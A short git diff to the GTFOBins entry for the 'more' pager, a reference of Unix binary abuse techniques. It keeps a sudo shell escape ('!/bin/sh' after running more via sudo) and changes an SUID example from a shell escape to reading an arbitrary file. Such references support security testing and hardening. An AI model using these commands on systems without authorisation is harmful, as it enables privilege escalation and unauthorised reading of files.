diff --git a/_gtfobins/more.md b/_gtfobins/more.md index aabf5c98..eda72d02 100644 --- a/_gtfobins/more.md +++ b/_gtfobins/more.md @@ -8,10 +8,9 @@ functions: - code: | TERM= sudo -E more /etc/profile !/bin/sh - suid-limited: + suid-enabled: - code: | - TERM= ./more /etc/profile - !/bin/sh + ./more file_to_read file-read: - code: | more file_to_read